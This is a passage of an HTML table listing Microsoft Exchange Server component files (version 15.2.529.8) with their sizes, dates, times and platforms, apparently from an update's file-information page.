29.8</td><td>224,640</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>15.2.529.8</td><td>186,752</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.contracts.dll</td><td>15.2.529.8</td><td>39,800</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.dll</td><td>15.2.529.8</td><td>119,160</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.msosyncxsd.dll</td><td>15.2.529.8</td><td>968,288</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.notification.dll</td><td>15.2.529.8</td><td>141,384</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.personaldataplatform.dll</td><td>15.2.529.8</td><td>769,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>15.2.529.8</td><td>139,640</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.provisioning.dll</td><td>15.2.529.8</td><td>56,696</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.rightsmanagement.dll</td><td>15.2.529.8</td><td>452,984</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.scheduledtimers.dll</td><td>15.2.529.8</td><td>32,640</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>15.2.529.8</td><td>256,896</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>15.2.529.8</td><td>11,809,864</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>15.2.529.8</td><td>37,760</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.storageconfigurationresources.dll</td><td>15.2.529.8</td><td>655,736</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storeobjects.dll</td><td>15.2.529.8</td><td>175,488</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>15.2.529.8</td><td>36,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.eventlog.dll</td><td>15.2.529.8</td><td>14,200</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>15.2.529.8</td><td>14,416</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll</td><td>15.2.529.8</td><td>14,928</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>15.2.529.8</td><td>72,808</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.delivery.eventlog.dll</td><td>15.2.529.8</td><td>13,392</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.certificatelogger.dll</td><td>15.2.529.8</td><td>22,912</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>15.2.529.8</td><td>2,212,736</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.performancelogger.dll</td><td>15.2.529.8</td><td>23,936</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.common.dll</td><td>15.2.529.8</td><td>546,680</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.eventlog.dll</td><td>15.2.529.8</td><td>215,416</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exchangejobs.dll</td><td>15.2.529.8</td><td>194,640</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exe</td><td>15.2.529.8</td><td>146,304</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.fuseboxperfcounters.dll</td><td>15.2.529.8</td><td>27,520</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregation.eventlog.dll</td><td>15.2.529.8</td><td>13,696</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregationservicelet.dll</td><td>15.2.529.8</td><td>49,528</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.eventlog.dll</td><td>15.2.529.8</td><td>28,240</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.exe</td><td>15.2.529.8</td><td>208,768</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.disklocker.events.dll</td><td>15.2.529.8</td><td>88,960</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.disklocker.interop.dll</td><td>15.2.529.8</td><td>32,632</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.calendarmigration.dll</td><td>15.2.529.8</td><td>46,160</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.common.dll</td><td>15.2.529.8</td><td>19,024</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.dll</td><td>15.2.529.8</td><td>473,680</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.ha.events.dll</td><td>15.2.529.8</td><td>206,208</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.dxstore.ha.instance.exe</td><td>15.2.529.8</td><td>36,936</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.eac.flighting.dll</td><td>15.2.529.8</td><td>131,664</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>15.2.529.8</td><td>21,888</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>15.2.529.8</td><td>148,352</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterproviders.dll</td><td>15.2.529.8</td><td>220,024</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>15.2.529.8</td><td>23,928</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>15.2.529.8</td><td>97,896</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll</td><td>15.2.529.8</td><td>1,266,256</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll.deploy</td><td>15.2.529.8</td><td>1,266,256</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.application</td><td>Not applicable</td><td>15,848</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.exe.deploy</td><td>15.2.529.8</td><td>87,416</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.manifest</td><td>Not applicable</td><td>66,576</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.strings.dll.deploy</td><td>15.2.529.8</td><td>52,088</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.mailboxsearch.dll</td><td>15.2.529.8</td><td>292,216</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.birthdaycalendar.dll</td><td>15.2.529.8</td><td>73,296</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.defaultservicesettings.dll</td><td>15.2.529.8</td><td>45,952</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.dll</td><td>15.2.529.8</td><td>218,496</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.management.dll</td><td>15.2.529.8</td><td>78,208</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.bookings.dll</td><td>15.2.529.8</td><td>35,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.calendaring.dll</td><td>15.2.529.8</td><td>936,552</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.common.dll</td><td>15.2.529.8</td><td>336,256</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.connectors.dll</td><td>15.2.529.8</td><td>52,600</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.contentsubmissions.dll</td><td>15.2.529.8</td><td>32,128</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.context.dll</td><td>15.2.529.8</td><td>60,800</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.datamodel.dll</td><td>15.2.529.8</td><td>853,880</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.fileproviders.dll</td><td>15.2.529.8</td><td>291,712</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.foldersharing.dll</td><td>15.2.529.8</td><td>39,288</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.holidaycalendars.dll</td><td>15.2.529.8</td><td>76,360</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.insights.dll</td><td>15.2.529.8</td><td>166,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetinglocation.dll</td><td>15.2.529.8</td><td>1,486,720</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingparticipants.dll</td><td>15.2.529.8</td><td>122,448</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingtimecandidates.dll</td><td>15.2.529.8</td><td>12,327,288</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.onlinemeetings.dll</td><td>15.2.529.8</td><td>264,056</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.people.dll</td><td>15.2.529.8</td><td>37,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.peopleinsights.dll</td><td>15.2.529.8</td><td>186,960</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.reminders.dll</td><td>15.2.529.8</td><td>64,592</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.schedules.dll</td><td>15.2.529.8</td><td>84,064</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.shellservice.dll</td><td>15.2.529.8</td><td>63,872</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.tasks.dll</td><td>15.2.529.8</td><td>100,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.xrm.dll</td><td>15.2.529.8</td><td>144,768</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entityextraction.calendar.dll</td><td>15.2.529.8</td><td>270,200</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.common.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.configuration.dll</td><td>15.2.529.8</td><td>15,744</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.dll</td><td>15.2.529.8</td><td>130,424</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.ews.configuration.dll</td><td>15.2.529.8</td><td>254,336</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>15.2.529.8</td><td>37,240</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>15.2.529.8</td><td>640,592</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.partner.dll</td><td>15.2.529.8</td><td>37,240</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.federateddirectory.dll</td><td>15.2.529.8</td><td>146,512</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.ffosynclogmsg.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.dll</td><td>15.2.529.8</td><td>594,296</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.eventlogs.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendtransport.monitoring.dll</td><td>15.2.529.8</td><td>30,072</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.griffin.variantconfiguration.dll</td><td>15.2.529.8</td><td>99,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>15.2.529.8</td><td>42,360</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>15.2.529.8</td><td>40,320</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.addressfinder.dll</td><td>15.2.529.8</td><td>54,136</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.common.dll</td><td>15.2.529.8</td><td>164,224</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.diagnostics.dll</td><td>15.2.529.8</td><td>58,952</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.flighting.dll</td><td>15.2.529.8</td><td>204,160</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.passivemonitor.dll</td><td>15.2.529.8</td><td>17,784</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.proxyassistant.dll</td><td>15.2.529.8</td><td>30,800</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routerefresher.dll</td><td>15.2.529.8</td><td>38,784</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routeselector.dll</td><td>15.2.529.8</td><td>48,504</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routing.dll</td><td>15.2.529.8</td><td>180,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpredirectmodules.dll</td><td>15.2.529.8</td><td>36,736</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.httputilities.dll</td><td>15.2.529.8</td><td>25,976</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.data.dll</td><td>15.2.529.8</td><td>1,868,152</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.diagnosisutil.dll</td><td>15.2.529.8</td><td>54,864</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.eopinstantprovisioning.dll</td><td>15.2.529.8</td><td>35,912</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.idserialization.dll</td><td>15.2.529.8</td><td>35,920</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll.fe</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>15.2.529.8</td><td>263,040</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.exe.fe</td><td>15.2.529.8</td><td>263,040</td><td>01-Jan-2020</td><td>11:23</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>15.2.529.8</td><td>25,160</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe.fe</td><td>15.2.529.8</td><td>25,160</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imapconfiguration.dl1</td><td>15.2.529.8</td><td>53,328</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.inference.common.dll</td><td>15.2.529.8</td><td>217,160</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.hashtagsrelevance.dll</td><td>15.2.529.8</td><td>32,128</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.inference.peoplerelevance.dll</td><td>15.2.529.8</td><td>282,192</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.ranking.dll</td><td>15.2.529.8</td><td>19,016</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.safetylibrary.dll</td><td>15.2.529.8</td><td>83,832</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.service.eventlog.dll</td><td>15.2.529.8</td><td>15,232</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>15.2.529.8</td><td>94,072</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>15.2.529.8</td><td>1,840,000</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>15.2.529.8</td><td>71,544</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>15.2.529.8</td><td>175,488</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>15.2.529.8</td><td>45,944</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>15.2.529.8</td><td>159,608</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>15.2.529.8</td><td>51,072</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>15.2.529.8</td><td>46,160</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.databasemanager.dll</td><td>15.2.529.8</td><td>32,336</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>15.2.529.8</td><td>100,224</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueue.eventlog.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueueservicelet.dll</td><td>15.2.529.8</td><td>271,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitch.dll</td><td>15.2.529.8</td><td>22,392</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitchconfiguration.dll</td><td>15.2.529.8</td><td>33,664</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.auditing.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.certificatelog.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll</td><td>15.2.529.8</td><td>27,520</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.easlog.dll</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ecplog.dll</td><td>15.2.529.8</td><td>22,392</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.eventlog.dll</td><td>15.2.529.8</td><td>66,432</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ewslog.dll</td><td>15.2.529.8</td><td>29,568</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll</td><td>15.2.529.8</td><td>19,840</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.groupescalationlog.dll</td><td>15.2.529.8</td><td>20,344</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.httpproxylog.dll</td><td>15.2.529.8</td><td>19,320</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.hxservicelog.dll</td><td>15.2.529.8</td><td>34,176</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.iislog.dll</td><td>15.2.529.8</td><td>103,808</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.lameventlog.dll</td><td>15.2.529.8</td><td>31,616</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.migrationlog.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll</td><td>15.2.529.8</td><td>20,856</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oauthcafelog.dll</td><td>15.2.529.8</td><td>16,248</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.outlookservicelog.dll</td><td>15.2.529.8</td><td>49,016</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owaclientlog.dll</td><td>15.2.529.8</td><td>44,408</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owalog.dll</td><td>15.2.529.8</td><td>38,264</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.perflog.dll</td><td>15.2.529.8</td><td>10,375,248</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.pfassistantlog.dll</td><td>15.2.529.8</td><td>29,048</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.rca.dll</td><td>15.2.529.8</td><td>21,584</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.restlog.dll</td><td>15.2.529.8</td><td>24,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.store.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll</td><td>15.2.529.8</td><td>21,880</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.core.dll</td><td>15.2.529.8</td><td>89,472</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.auditing.dll</td><td>15.2.529.8</td><td>20,856</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.certificatelog.dll</td><td>15.2.529.8</td><td>26,488</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.cmdletinfralog.dll</td><td>15.2.529.8</td><td>21,584</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.common.dll</td><td>15.2.529.8</td><td>28,024</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.easlog.dll</td><td>15.2.529.8</td><td>28,536</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.errordetection.dll</td><td>15.2.529.8</td><td>36,216</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.ewslog.dll</td><td>15.2.529.8</td><td>17,000</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.griffinperfcounter.dll</td><td>15.2.529.8</td><td>19,832</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.groupescalationlog.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.httpproxylog.dll</td><td>15.2.529.8</td><td>17,488</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.hxservicelog.dll</td><td>15.2.529.8</td><td>20,048</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.iislog.dll</td><td>15.2.529.8</td><td>57,208</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.migrationlog.dll</td><td>15.2.529.8</td><td>17,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oabdownloadlog.dll</td><td>15.2.529.8</td><td>18,808</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oauthcafelog.dll</td><td>15.2.529.8</td><td>16,256</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.outlookservicelog.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owaclientlog.dll</td><td>15.2.529.8</td>